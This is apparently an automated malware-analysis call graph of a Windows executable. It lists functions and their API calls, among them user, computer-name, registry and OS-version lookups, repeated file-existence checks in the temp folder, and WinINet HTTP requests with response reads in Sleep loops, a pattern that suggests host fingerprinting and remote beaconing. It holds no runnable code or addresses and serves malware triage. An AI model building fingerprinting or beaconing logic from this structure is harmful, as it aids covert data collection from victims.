__dosmaperr 31398->31410 31399->31382 31401 110541 31411 10f409 25 API calls __fread_nolock 31401->31411 31403 11054c 31403->31382 31404->31386 31405->31396 31406->31389 31407->31391 31408->31394 31409->31396 31410->31401 31411->31403 31413->31359 31417 100fc0 31414->31417 31415 103730 70 API calls 31415->31417 31416 e61f0 114 API calls 31416->31417 31417->31415 31417->31416 31436 fef40 31417->31436 31419 10100c Sleep 31419->31417 31423 101050 31420->31423 31421 e61f0 114 API calls 31421->31423 31422 103730 70 API calls 31422->31423 31423->31421 31423->31422 31424 fef40 158 API calls 31423->31424 31425 10109c Sleep 31424->31425 31425->31423 31427 10111c 31426->31427 31428 1010df 31426->31428 31429 103730 70 API calls 31428->31429 31430 1010f6 31429->31430 31431 e61f0 114 API calls 31430->31431 31432 1010fd 31431->31432 31433 103730 70 API calls 31432->31433 31434 101115 31433->31434 31435 e61f0 114 API calls 31434->31435 31435->31427 31437 fef7c 31436->31437 31441 ff66e shared_ptr 31436->31441 31438 103730 70 API calls 31437->31438 31437->31441 31442 fef9d 31438->31442 31439 ff6e4 shared_ptr 31443 109db0 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 31439->31443 31440 ff741 31444 10f419 25 API calls 31440->31444 31441->31439 31441->31440 31445 e61f0 114 API calls 31442->31445 31446 ff706 31443->31446 31450 ff746 31444->31450 31447 fefa4 31445->31447 31446->31419 31448 103730 70 API calls 31447->31448 31449 fefb6 31448->31449 31451 103730 70 API calls 31449->31451 31784 e78e0 31450->31784 31453 fefc8 31451->31453 31740 f05b0 31453->31740 31458 ff7a6 31460 ff7d6 shared_ptr 31458->31460 31465 100f6a 31458->31465 31459 103730 70 API calls 31461 fefe9 31459->31461 31805 e93d0 31460->31805 31463 103730 70 API calls 31461->31463 31464 ff001 31463->31464 31467 e61f0 114 API calls 31464->31467 31468 10f419 25 API calls 31465->31468 31471 ff008 31467->31471 31472 100f83 31468->31472 31772 e9c20 31471->31772 31477 e43e0 27 API calls 31479 ff80b RegOpenKeyExA RegCloseKey 31477->31479 31478 ff295 31481 103730 70 API calls 31478->31481 31561 ff728 31478->31561 31482 e43e0 27 API calls 31479->31482 31480 103730 70 API calls 31483 ff030 31480->31483 31484 ff2bb 31481->31484 31485 ff85b 31482->31485 31486 103730 70 API calls 31483->31486 31487 103730 70 API calls 31484->31487 31488 103730 70 API calls 31485->31488 31489 ff048 31486->31489 31490 ff2d0 31487->31490 31491 ff879 31488->31491 31492 e61f0 114 API calls 31489->31492 31493 103730 70 API calls 31490->31493 31495 e61f0 114 API calls 31491->31495 31496 ff04f 31492->31496 31494 ff2e2 31493->31494 31497 f05b0 121 API calls 31494->31497 31498 ff880 31495->31498 31499 e9c20 27 API calls 31496->31499 31500 ff2ee 31497->31500 31501 103730 70 API calls 31498->31501 31502 ff05b 31499->31502 31503 103730 70 API calls 31500->31503 31504 ff895 31501->31504 31502->31478 31507 103730 70 API calls 31502->31507 31505 ff303 31503->31505 31506 e61f0 114 API calls 31504->31506 31509 103730 70 API calls 31505->31509 31510 ff89c 31506->31510 31508 ff078 31507->31508 31511 e61f0 114 API calls 31508->31511 31512 ff31b 31509->31512 31513 ff8b3 GetUserNameA 31510->31513 31519 ff080 31511->31519 31514 e61f0 114 API calls 31512->31514 31515 ff906 31513->31515 31516 ff322 31514->31516 31515->31515 31518 104640 27 API calls 31515->31518 31517 e9c20 27 API calls 31516->31517 31520 ff32e 31517->31520 31521 ff922 31518->31521 31522 ff70a 31519->31522 31523 ff0d1 31519->31523 31527 103730 70 API calls 31520->31527 31535 ff5fe shared_ptr 31520->31535 31928 eb250 GetComputerNameExW 31521->31928 32079 104b50 27 API calls 31522->32079 31526 104640 27 API calls 31523->31526 31530 ff0ee 31526->31530 31531 ff34a 31527->31531 31528 ff70f 31532 10f419 25 API calls 31528->31532 31536 103670 25 API calls 31530->31536 31537 103730 70 API calls 31531->31537 31539 ff714 31532->31539 31534 ff73c 31538 10f419 25 API calls 31534->31538 31535->31441 31535->31534 31549 ff0fa shared_ptr 31536->31549 31541 ff362 31537->31541 31538->31440 31543 10f419 25 API calls 31539->31543 31542 e61f0 114 API calls 31541->31542 31545 ff369 31542->31545 31547 ff719 31543->31547 31544 ff983 31544->31544 31552 104640 27 API calls 31544->31552 31548 e9c20 27 API calls 31545->31548 31546 ff15c shared_ptr 31551 103730 70 API calls 31546->31551 32080 108a4c 27 API calls 2 library calls 31547->32080 31553 ff375 31548->31553 31549->31528 31549->31546 31555 ff175 31551->31555 31556 ff99b 31552->31556 31553->31535 31560 103730 70 API calls 31553->31560 31554 ff723 32081 104b50 27 API calls 31554->32081 31558 e61f0 114 API calls 31555->31558 32068 e9e20 31556->32068 31571 ff17d 31558->31571 31563 ff392 31560->31563 32082 108a8c 27 API calls 2 library calls 31561->32082 31567 e61f0 114 API calls 31563->31567 31565 e43e0 27 API calls 31566 ff9bd 31565->31566 31569 103730 70 API calls 31566->31569 31580 ff39a 31567->31580 31568 ff732 31570 10f419 25 API calls 31568->31570 31573 ff9d7 31569->31573 31574 ff737 31570->31574 31572 104640 27 API calls 31571->31572 31575 ff1db 31572->31575 31576 e61f0 114 API calls 31573->31576 31577 10f419 25 API calls 31574->31577 31578 103670 25 API calls 31575->31578 31579 ff9e2 31576->31579 31577->31534 31589 ff1e7 shared_ptr 31578->31589 31581 e43e0 27 API calls 31579->31581 31580->31554 31582 ff3eb 31580->31582 31583 ff9f9 31581->31583 31584 104640 27 API calls 31582->31584 31585 103730 70 API calls 31583->31585 31587 ff408 31584->31587 31590 ffa0f 31585->31590 31586 ff249 shared_ptr 31586->31478 32076 eb5f0 114 API calls 3 library calls 31586->32076 31588 103670 25 API calls 31587->31588 31598 ff414 shared_ptr 31588->31598 31589->31539 31589->31586 31592 e61f0 114 API calls 31590->31592 31594 ffa1a 31592->31594 31593 ff261 31593->31478 32077 111652 14 API calls __dosmaperr 31593->32077 31596 103730 70 API calls 31594->31596 31595 ff476 shared_ptr 31600 103730 70 API calls 31595->31600 31599 ffa3d 31596->31599 31598->31568 31598->31595 31602 e61f0 114 API calls 31599->31602 31603 ff48f 31600->31603 31601 ff26a 31605 111f87 40 API calls 31601->31605 31606 ffa48 31602->31606 31604 e61f0 114 API calls 31603->31604 31612 ff497 31604->31612 31607 ff289 31605->31607 31608 103730 70 API calls 31606->31608 31607->31478 31607->31547 31609 ffa6b 31608->31609 31610 e61f0 114 API calls 31609->31610 31611 ffa76 31610->31611 31613 103730 70 API calls 31611->31613 31614 104640 27 API calls 31612->31614 31615 ffa99 31613->31615 31616 ff4f5 31614->31616 31617 e61f0 114 API calls 31615->31617 31618 103670 25 API calls 31616->31618 31619 ffaa4 31617->31619 31623 ff501 shared_ptr 31618->31623 31620 103730 70 API calls 31619->31620 31622 ffac7 31620->31622 31621 ff563 shared_ptr 31624 103730 70 API calls 31621->31624 31625 e61f0 114 API calls 31622->31625 31623->31574 31623->31621 31626 ff57e 31624->31626 31627 ffad2 31625->31627 31628 103730 70 API calls 31626->31628 31629 103730 70 API calls 31627->31629 31630 ff593 31628->31630 31631 ffaf5 31629->31631 31632 103730 70 API calls 31630->31632 31633 e61f0 114 API calls 31631->31633 31634 ff5ae 31632->31634 31635 ffb00 31633->31635 31636 e61f0 114 API calls 31634->31636 31637 103730 70 API calls 31635->31637 31639 ff5b5 31636->31639 31638 ffb23 31637->31638 31640 e61f0 114 API calls 31638->31640 31643 104640 27 API calls 31639->31643 31641 ffb2e 31640->31641 31644 103730 70 API calls 31641->31644 31645 ff5f2 31643->31645 31646 ffb51 31644->31646 32078 feb10 154 API calls 3 library calls 31645->32078 31648 e61f0 114 API calls 31646->31648 31650 ffb5c 31648->31650 31649 ff5fb 31649->31535 31651 103730 70 API calls 31650->31651 31652 ffb7d 31651->31652 31653 e61f0 114 API calls 31652->31653 31654 ffb88 31653->31654 31655 103730 70 API calls 31654->31655 31656 ffb9a 31655->31656 31657 e61f0 114 API calls 31656->31657 31658 ffba5 31657->31658 31659 103730 70 API calls 31658->31659 31660 ffbb7 31659->31660 31661 e61f0 114 API calls 31660->31661 31662 ffbc2 31661->31662 31663 103730 70 API calls 31662->31663 31664 ffbdf 31663->31664 31665 e61f0 114 API calls 31664->31665 31666 ffbea 31665->31666 32083 104ce0 31666->32083 31668 ffbfe 31669 105b30 27 API calls 31668->31669 31670 ffc18 31669->31670 31671 105b30 27 API calls 31670->31671 31672 ffc35 31671->31672 31673 105b30 27 API calls 31672->31673 31674 ffc52 31673->31674 31675 104ce0 27 API calls 31674->31675 31676 ffc67 31675->31676 31677 105b30 27 API calls 31676->31677 31678 ffc86 31677->31678 31679 104ce0 27 API calls 31678->31679 31680 ffc9b 31679->31680 31681 105b30 27 API calls 31680->31681 31682 ffcba 31681->31682 31683 104ce0 27 API calls 31682->31683 31684 ffccf 31683->31684 31685 105b30 27 API calls 31684->31685 31686 ffcee 31685->31686 31687 104ce0 27 API calls 31686->31687 31688 ffd03 31687->31688 31689 105b30 27 API calls 31688->31689 31690 ffd22 31689->31690 31691 104ce0 27 API calls 31690->31691 31692 ffd37 31691->31692 31693 105b30 27 API calls 31692->31693 31694 ffd56 31693->31694 31695 104ce0 27 API calls 31694->31695 31696 ffd6b 31695->31696 31697 105b30 27 API calls 31696->31697 31698 ffd8a 31697->31698 31699 104ce0 27 API calls 31698->31699 31700 ffd9f 31699->31700 31701 105b30 27 API calls 31700->31701 31702 ffdbe 31701->31702 31703 104ce0 27 API calls 31702->31703 31704 ffdd3 31703->31704 31705 105b30 27 API calls 31704->31705 31706 ffdf2 31705->31706 31707 105b30 27 API calls 31706->31707 31708 ffe14 31707->31708 31709 105b30 27 API calls 31708->31709 31710 ffe36 31709->31710 31711 104ce0 27 API calls 31710->31711 31712 ffe4b shared_ptr 31711->31712 31713 100a73 31712->31713 31714 100b48 31712->31714 31716 103730 70 API calls 31713->31716 31715 103730 70 API calls 31714->31715 31717 100b5d 31715->31717 31718 100a89 31716->31718 31720 103730 70 API calls 31717->31720 31719 e61f0 114 API calls 31718->31719 31721 100a94 31719->31721 31722 100b72 31720->31722 31723 104ce0 27 API calls 31721->31723 32087 e4d60 27 API calls shared_ptr 31722->32087 31725 100aa8 31723->31725 31727 103670 25 API calls 31725->31727 31726 100b81 32088 ecb00 27 API calls 31726->32088 31738 100ab6 shared_ptr 31727->31738 31729 100b92 31730 103730 70 API calls 31729->31730 31731 100ba7 31730->31731 31732 e61f0 114 API calls 31731->31732 31733 100bb2 31732->31733 31734 105b30 27 API calls 31733->31734 31735 100bcc 31734->31735 31736 103670 25 API calls 31735->31736 31736->31738 31737 109db0 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 31739 100f66 31737->31739 31738->31737 31739->31419 31741 f0a07 31740->31741 31742 f0602 31740->31742 31743 104640 27 API calls 31741->31743 31742->31741 31744 f0616 Sleep InternetOpenW InternetConnectA 31742->31744 31749 f09b4 shared_ptr 31743->31749 31745 103730 70 API calls 31744->31745 31746 f06a2 31745->31746 31747 e61f0 114 API calls 31746->31747 31751 f06ad HttpOpenRequestA 31747->31751 31748 f0adb 31752 10f419 25 API calls 31748->31752 31749->31748 31753 f0a02 shared_ptr 31749->31753 31750 109db0 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 31754 f0ac8 31750->31754 31759 f06d6 shared_ptr 31751->31759 31756 f0ae0 31752->31756 31753->31750 31754->31459 31757 103730 70 API calls 31758 f073e 31757->31758 31760 e61f0 114 API calls 31758->31760 31759->31757 31761 f0749 31760->31761 31762 103730 70 API calls 31761->31762 31763 f0762 31762->31763 31764 e61f0 114 API calls 31763->31764 31765 f076d HttpSendRequestA 31764->31765 31768 f0790 shared_ptr 31765->31768 31767 f0818 InternetReadFile 31770 f083f _Yarn 31767->31770 31768->31767 31769 f07bc shared_ptr 31768->31769 31769->31767 31769->31768 31771 f08bf InternetReadFile 31770->31771 31771->31770 31780 e9d43 shared_ptr 31772->31780 31783 e9c7c shared_ptr 31772->31783 31773 e9e0a 32089 104b50 27 API calls 31773->32089 31774 104640 27 API calls 31774->31783 31776 e9e0f 31779 10f419 25 API calls 31776->31779 31777 e9de3 shared_ptr 31778 109db0 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 31777->31778 31781 e9e06 31778->31781 31782 e9e14 31779->31782 31780->31776 31780->31777 31781->31478 31781->31480 31783->31773 31783->31774 31783->31776 31783->31780 31785 e7c4a 31784->31785 31799 e795f shared_ptr 31784->31799 31786 e7d12 31785->31786 31787 e7c73 31785->31787 32091 104b50 27 API calls 31786->32091 31788 104640 27 API calls 31787->31788 31795 e7c92 shared_ptr 31788->31795 31790 e7d17 31791 10f419 25 API calls 31790->31791 31792 e7d1c 31791->31792 31793 e7ce8 shared_ptr 31794 109db0 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 31793->31794 31796 e7d0b 31794->31796 31795->31790 31795->31793 31800 103670 31796->31800 31797 104640 27 API calls 31797->31799 31799->31785 31799->31786 31799->31790 31799->31797 32090 105e90 27 API calls _Yarn 31799->32090 31801 1036a1 shared_ptr 31800->31801 31802 10367e 31800->31802 31801->31458 31802->31801 31803 10f419 25 API calls 31802->31803 31804 1036ec 31803->31804 32092 10ba40 31805->32092 31807 e9436 GetVersionExW 31808 e9458 31807->31808 31854 e9588 shared_ptr 31807->31854 31810 103730 70 API calls 31808->31810 31809 109db0 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 31811 e9a0d 31809->31811 31812 e9467 31810->31812 31899 e43e0 31811->31899 31813 e61f0 114 API calls 31812->31813 31814 e9472 31813->31814 31815 103730 70 API calls 31814->31815 31816 e9494 31815->31816 31817 e61f0 114 API calls 31816->31817 31818 e949f GetModuleHandleA GetProcAddress 31817->31818 31820 e94c5 shared_ptr 31818->31820 31821 e9546 shared_ptr 31820->31821 31824 e9a14 31820->31824 31822 e9577 GetSystemInfo 31821->31822 31823 e9573 GetNativeSystemInfo 31821->31823 31828 e957d 31822->31828 31823->31828 31825 10f419 25 API calls 31824->31825 31826 e9a19 31825->31826 31827 10f419 25 API calls 31826->31827 31829 e9a1e 31827->31829 31830 e95df 31828->31830 31831 e96b9 31828->31831 31828->31854 31833 103730 70 API calls 31830->31833 31832 103730 70 API calls 31831->31832 31834 e96e5 31832->31834 31835 e9600 31833->31835 31836 e61f0 114 API calls 31834->31836 31837 e61f0 114 API calls 31835->31837 31839 e96ec 31836->31839 31838 e9607 31837->31838 31840 103730 70 API calls 31838->31840 31841 103730 70 API calls 31839->31841 31842 e961f 31840->31842 31843 e9704 31841->31843 31844 e61f0 114 API calls 31842->31844 31845 e61f0 114 API calls 31843->31845 31847 e9626 31844->31847 31846 e970b 31845->31846 31848 103730 70 API calls 31846->31848 32094 11227f 40 API calls 31847->32094 31850 e973c 31848->31850 31852 e61f0 114 API calls 31850->31852 31851 e9651 31851->31826 31851->31854 31853 e9743 31852->31853 32095 e91b0 119 API calls 3 library calls 31853->32095 31854->31809 31856 e9752 31857 103730 70 API calls 31856->31857 31858 e978d 31857->31858 31859 e61f0 114 API calls 31858->31859 31860 e9794 31859->31860 31861 103730 70 API calls 31860->31861 31862 e97ac 31861->31862 31863 e61f0 114 API calls 31862->31863 31864 e97b3 31863->31864 31865 103730 70 API calls 31864->31865 31866 e97e4 31865->31866 31867 e61f0 114 API calls 31866->31867 31868 e97eb 31867->31868 32096 e91b0 119 API calls 3 library calls 31868->32096 31870 e97fa 31871 103730 70 API calls 31870->31871 31872 e9835 31871->31872 31873 e61f0 114 API calls 31872->31873 31874 e983c 31873->31874 31875 103730 70 API calls 31874->31875 31876 e9854 31875->31876 31877 e61f0 114 API calls 31876->31877 31878 e985b 31877->31878 31879 103730 70 API calls 31878->31879 31880 e988c 31879->31880 31881 e61f0 114 API calls 31880->31881 31882 e9893 31881->31882 32097 e91b0 119 API calls 3 library calls 31882->32097 31884 e98a2 31885 103730 70 API calls 31884->31885 31886 e98dd 31885->31886 31887 e61f0 114 API calls 31886->31887 31888 e98e4 31887->31888 31889 103730 70 API calls 31888->31889 31890 e98fc 31889->31890 31891 e61f0 114 API calls 31890->31891 31892 e9903 31891->31892 31893 103730 70 API calls 31892->31893 31894 e9934 31893->31894 31895 e61f0 114 API calls 31894->31895 31896 e993b 31895->31896 32098 e91b0 119 API calls 3 library calls 31896->32098 31898 e994a 31898->31854 31900 e4404 31899->31900 31901 e447d 31900->31901 31902 104640 27 API calls 31900->31902 31903 109db0 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 31901->31903 31902->31901 31904 e448c 31903->31904 31905 e9a20 31904->31905 31906 10ba40 __fread_nolock 31905->31906 31907 e9a85 GetVersionExW 31906->31907 31908 e9aad 31907->31908 31925 e9aa3 31907->31925 31909 103730 70 API calls 31908->31909 31911 e9abc 31909->31911 31910 109db0 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 31912 e9c05 31910->31912 31913 e61f0 114 API calls 31911->31913 31912->31477 31914 e9ac7 31913->31914 31915 103730 70 API calls 31914->31915 31916 e9ae9 31915->31916 31917 e61f0 114 API calls 31916->31917 31918 e9af4 GetModuleHandleA GetProcAddress 31917->31918 31924 e9b1a shared_ptr 31918->31924 31920 e9b97 shared_ptr 31921 e9bc8 GetSystemInfo 31920->31921 31922 e9bc4 GetNativeSystemInfo 31920->31922 31921->31925 31922->31925 31923 e9c0c 31926 10f419 25 API calls 31923->31926 31924->31920 31924->31923 31925->31910 31927 e9c11 31926->31927 31929 eb2e0 31928->31929 31929->31929 31930 eb4ab 31929->31930 31931 eb331 31929->31931 31937 eb2f4 _Yarn 31929->31937 32114 e26a0 27 API calls 31930->32114 32113 105ad0 27 API calls std::_Facet_Register 31931->32113 31933 eb4b0 31936 10f419 25 API calls 31933->31936 31938 eb4b5 31936->31938 32099 103400 31937->32099 31939 eb483 shared_ptr 31940 109db0 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 31939->31940 31941 eb4a7 31940->31941 31943 eb700 31941->31943 31942 eb3e7 31942->31933 31942->31939 31944 103730 70 API calls 31943->31944 31945 eb742 31944->31945 31946 e61f0 114 API calls 31945->31946 31947 eb74a 31946->31947 32117 ea270 GetTempPathA 31947->32117 31950 105b30 27 API calls 31951 eb76f GetFileAttributesA 31950->31951 31952 eb788 shared_ptr 31951->31952 31953 ec689 31952->31953 31954 eb853 shared_ptr 31952->31954 31955 10f419 25 API calls 31953->31955 31957 103730 70 API calls 31954->31957 32067 eb861 31954->32067 31956 ec6c5 31955->31956 31959 eb87c 31957->31959 31958 104640 27 API calls 31961 ec675 GetModuleFileNameA 31958->31961 31960 e61f0 114 API calls 31959->31960 31962 eb884 31960->31962 31961->31544 31963 ea270 115 API calls 31962->31963 31964 eb898 31963->31964 31965 105b30 27 API calls 31964->31965 31966 eb8a9 GetFileAttributesA 31965->31966 31967 eb8c2 shared_ptr 31966->31967 31968 103730 70 API calls 31967->31968 31967->32067 31969 eb9b6 31968->31969 31970 e61f0 114 API calls 31969->31970 31971 eb9be 31970->31971 31972 ea270 115 API calls 31971->31972 31973 eb9d2 31972->31973 31974 105b30 27 API calls 31973->31974 31975 eb9e3 GetFileAttributesA 31974->31975 31976 eb9fc shared_ptr 31975->31976 31977 103730 70 API calls 31976->31977 31976->32067 31978 ebaf0 31977->31978 31979 e61f0 114 API calls 31978->31979 31980 ebaf8 31979->31980 31981 ea270 115 API calls 31980->31981 31982 ebb0c 31981->31982 31983 105b30 27 API calls 31982->31983 31984 ebb1d GetFileAttributesA 31983->31984 31985 ebb36 shared_ptr 31984->31985 31986 103730 70 API calls 31985->31986 31985->32067 31987 ebc2a 31986->31987 31988 e61f0 114 API calls 31987->31988 31989 ebc32 31988->31989 31990 ea270 115 API calls 31989->31990 31991 ebc46 31990->31991 31992 105b30 27 API calls 31991->31992 31993 ebc57 GetFileAttributesA 31992->31993 31994 ebc70 shared_ptr 31993->31994 31995 103730 70 API calls 31994->31995 31994->32067 31996 ebd64 31995->31996 31997 e61f0 114 API calls 31996->31997 31998 ebd6c 31997->31998 31999 ea270 115 API calls 31998->31999 32000 ebd80 31999->32000 32001 105b30 27 API calls 32000->32001 32002 ebd91 GetFileAttributesA 32001->32002 32003 ebdaa shared_ptr 32002->32003 32004 103730 70 API calls 32003->32004 32003->32067 32005 ebe9e 32004->32005 32006 e61f0 114 API calls 32005->32006 32007 ebea6 32006->32007 32008 ea270 115 API calls 32007->32008 32009 ebeba 32008->32009 32010 105b30 27 API calls 32009->32010 32011 ebecb GetFileAttributesA 32010->32011 32012 ebee4 shared_ptr 32011->32012 32013 103730 70 API calls 32012->32013 32012->32067 32014 ebfd8 32013->32014 32015 e61f0 114 API calls 32014->32015 32016 ebfe0 32015->32016 32017 ea270 115 API calls 32016->32017 32018 ebff4 32017->32018 32019 105b30 27 API calls 32018->32019 32020 ec005 GetFileAttributesA 32019->32020 32021 ec01e shared_ptr 32020->32021 32022 103730 70 API calls 32021->32022 32021->32067 32023 ec112 32022->32023 32024 e61f0 114 API calls 32023->32024 32025 ec11a 32024->32025 32026 ea270 115 API calls 32025->32026 32027 ec12e 32026->32027 32028 105b30 27 API calls 32027->32028 32029 ec13f GetFileAttributesA 32028->32029 32030 ec158 shared_ptr 32029->32030 32031 103730 70 API calls 32030->32031 32030->32067 32032 ec24c 32031->32032 32033 e61f0 114 API calls 32032->32033 32034 ec254 32033->32034 32035 ea270 115 API calls 32034->32035 32036 ec268 32035->32036 32037 105b30 27 API calls 32036->32037 32038 ec279 GetFileAttributesA 32037->32038 32039 ec292 shared_ptr 32038->32039 32040 103730 70 API calls 32039->32040 32039->32067 32041 ec386 32040->32041 32042 e61f0 114 API calls 32041->32042 32043 ec38e 32042->32043 32044 ea270 115 API calls 32043->32044 32045 ec3a2 32044->32045 32046 105b30 27 API calls 32045->32046 32047 ec3b3 GetFileAttributesA 32046->32047 32049 ec3cc shared_ptr 32047->32049 32048 103730 70 API calls 32050 ec4c0 32048->32050 32049->32048 32049->32067 32051 e61f0 114 API calls 32050->32051 32052 ec4cb 32051->32052 32053 ea270 115 API calls 32052->32053 32054 ec4e2 32053->32054 32055 105b30 27 API calls 32054->32055 32056 ec4f3 GetFileAttributesA 32055->32056 32058 ec50c shared_ptr 32056->32058 32057 e93d0 124 API calls 32059 ec61a 32057->32059 32058->32057 32058->32067 32060 e93d0 124 API calls 32059->32060 32059->32067 32061 ec624 32060->32061 32062 e93d0 124 API calls 32061->32062 32061->32067 32063 ec62e 32062->32063 32064 e93d0 124 API calls 32063->32064 32063->32067 32065 ec638 32064->32065 32066 e93d0 124 API calls 32065->32066 32065->32067 32066->32067 32067->31958 32070 e9e46 32068->32070 32069 e9e78 shared_ptr 32071 109db0 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 32069->32071 32070->32069 32072 e9e93 32070->32072 32073 e9e8f 32071->32073 32074 10f419 25 API calls 32072->32074 32073->31565 32075 e9e98 32074->32075 32076->31593 32077->31601 32078->31649 32084 104cf9 32083->32084 32085 104d0d _Yarn 32084->32085 32134 1058b0 27 API calls 3 library calls 32084->32134 32085->31668 32087->31726 32088->31729 32090->31799 32093 10ba57 32092->32093 32093->31807 32093->32093 32094->31851 32095->31856 32096->31870 32097->31884 32098->31898 32100 10341b 32099->32100 32112 103504 _Yarn shared_ptr 32099->32112 32101 103591 32100->32101 32105 1034b1 32100->32105 32106 10348a 32100->32106 32111 10349b _Yarn 32100->32111 32100->32112 32115 e26a0 27 API calls 32101->32115 32103 103596 32116 e25c0 27 API calls 2 library calls 32103->32116 32108 10a1a8 std::_Facet_Register 27 API calls 32105->32108 32105->32111 32106->32103 32109 10a1a8 std::_Facet_Register 27 API calls 32106->32109 32107 10359b 32108->32111 32109->32111 32110 10f419 25 API calls 32110->32101 32111->32110 32111->32112 32112->31942 32113->31937 32116->32107 32118 103730 70 API calls 32117->32118 32119 ea2cc 32118->32119 32120 e61f0 114 API calls 32119->32120 32121 ea2d7 32120->32121 32122 104640 27 API calls 32121->32122 32123 ea32d 32122->32123 32124 104640 27 API calls 32123->32124 32125 ea389 32124->32125 32126 105b30 27 API calls 32125->32126 32127 ea3a2 shared_ptr 32126->32127 32128 ea43e shared_ptr 32127->32128 32129 ea465 32127->32129 32130 109db0 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 32128->32130 32131 10f419 25 API calls 32129->32131 32132 ea461 32130->32132 32133 ea46a 32131->32133 32132->31950 32134->32085 32135 e89e0 Sleep 32136 e8abb 32135->32136 32137 e8a37 32135->32137 32139 104640 27 API calls 32136->32139 32190 109ed2 6 API calls 32137->32190 32141 e8ad7 32139->32141 32140 e8a41 32140->32136 32191 10a414 26 API calls 32140->32191 32142 104640 27 API calls 32141->32142 32144 e8af0 32142->32144 32145 104640 27 API calls 32144->32145 32147 e8b09 CreateThread Sleep 32145->32147 32146 e8ab1 32192 109e88 EnterCriticalSection LeaveCriticalSection WakeAllConditionVariable SetEvent ResetEvent 32146->32192 32149 e8b36 shared_ptr 32147->32149 32195 e8880 32147->32195 32150 e8bdc shared_ptr 32149->32150 32151 10f419 25 API calls 32149->32151 32152 e8bfd 32151->32152 32153 e8c44 32152->32153 32154 e8df1 32152->32154 32177 105d10 32153->32177 32193 e26a0 27 API calls 32154->32193 32157 e8df6 32159 10f419 25 API calls 32157->32159 32158 e8c64 32160 104ce0 27 API calls 32158->32160 32161 e8dfb 32159->32161 32162 e8c77 32160->32162 32163 10f419 25 API calls 32161->32163 32162->32157 32164 e8ca8 shared_ptr 32162->32164 32166 e8e00 32163->32166 32165 103730 70 API calls 32164->32165 32167 e8cd5 32165->32167 32168 103730 70 API calls 32167->32168 32169 e8cf0 32168->32169 32170 e61f0 114 API calls 32169->32170 32171 e8cf7 32170->32171 32172 104640 27 API calls 32171->32172 32173 e8d1d shared_ptr 32172->32173 32173->32161 32174 e8dca shared_ptr 32173->32174 32175 109db0 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 32174->32175 32176 e8ded 32175->32176 32178 105d54 32177->32178 32181 105d9c _Yarn 32177->32181 32179 105d88 32178->32179 32180 105daa 32178->32180 32182 105dfb 32179->32182 32183 105d8f 32179->32183 32180->32181 32186 10a1a8 std::_Facet_Register 27 API calls 32180->32186 32181->32158 32194 e25c0 27 API calls 2 library calls 32182->32194 32185 10a1a8 std::_Facet_Register 27 API calls 32183->32185 32187 105d95 32185->32187 32186->32181 32187->32181 32188 10f419 25 API calls 32187->32188 32189 105e05 shared_ptr 32188->32189 32189->32158 32190->32140 32191->32146 32192->32136 32194->32187 32196 103730 70 API calls 32195->32196 32197 e88b5 32196->32197 32198 103730 70 API calls 32197->32198 32199 e88c8 32198->32199 32200 103730 70 API calls 32199->32200 32201 e88d8 32200->32201 32202 103730 70 API calls 32201->32202 32203 e88ed 32202->32203 32204 103730 70 API calls 32203->32204 32205 e8902 32204->32205 32206 103730 70 API calls 32205->32206 32207 e8914 shared_ptr 32206->32207 32208 109db0 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 32207->32208 32209 e89d1 32208->32209 32210 f9640 Sleep 32211 104640 27 API calls 32210->32211 32212 f96c9 32211->32212 32260 ea470 SHGetFolderPathA 32212->32260 32215 105b30 27 API calls 32216 f96e9 GetFileAttributesA 32215->32216 32217 f9706 32216->32217 32218 103730 70 API calls 32217->32218 32219 f9932 32218->32219 32220 e61f0 114 API calls 32219->32220 32221 f993d 32220->32221 32222 103730 70 API calls 32221->32222 32223 f994f 32222->32223 32275 e9f00 32223->32275 32225 f995a 32226 103730 70 API calls 32225->32226 32227 f996c 32226->32227 32228 e61f0 114 API calls 32227->32228 32229 f9977 32228->32229 32230 104640 27 API calls 32229->32230 32231 f99c9 32230->32231 32232 ea470 115 API calls 32231->32232 32233 f99d5 32232->32233 32234 105b30 27 API calls 32233->32234 32235 f99ec 32234->32235 32236 105b30 27 API calls 32235->32236 32237 f9a06 32236->32237 32238 105b30 27 API calls 32237->32238 32239 f9a1d 32238->32239 32286 1035b0 32239->32286 32241 f9a2e 32242 105b30 27 API calls 32241->32242 32243 f9a6f 32242->32243 32291 10e5d0 32243->32291 32246 103730 70 API calls 32247 f9d6f 32246->32247 32248 103730 70 API calls 32247->32248 32249 f9d81 32248->32249 32294 f0af0 32249->32294 32252 10e5d0 28 API calls 32253 f9da0 32252->32253 32254 f9e6b shared_ptr 32253->32254 32256 f9e9f 32253->32256 32255 109db0 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 32254->32255 32257 f9e8c 32255->32257 32258 10f419 25 API calls 32256->32258 32259 f9ea4 32258->32259 32261 103730 70 API calls 32260->32261 32262 ea4cf 32261->32262 32263 e61f0 114 API calls 32262->32263 32264 ea4da 32263->32264 32265 104640 27 API calls 32264->32265 32266 ea530 32265->32266 32267 105b30 27 API calls 32266->32267 32268 ea549 shared_ptr 32267->32268 32270 ea5d2 32268->32270 32273 ea5ab shared_ptr 32268->32273 32269 109db0 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API 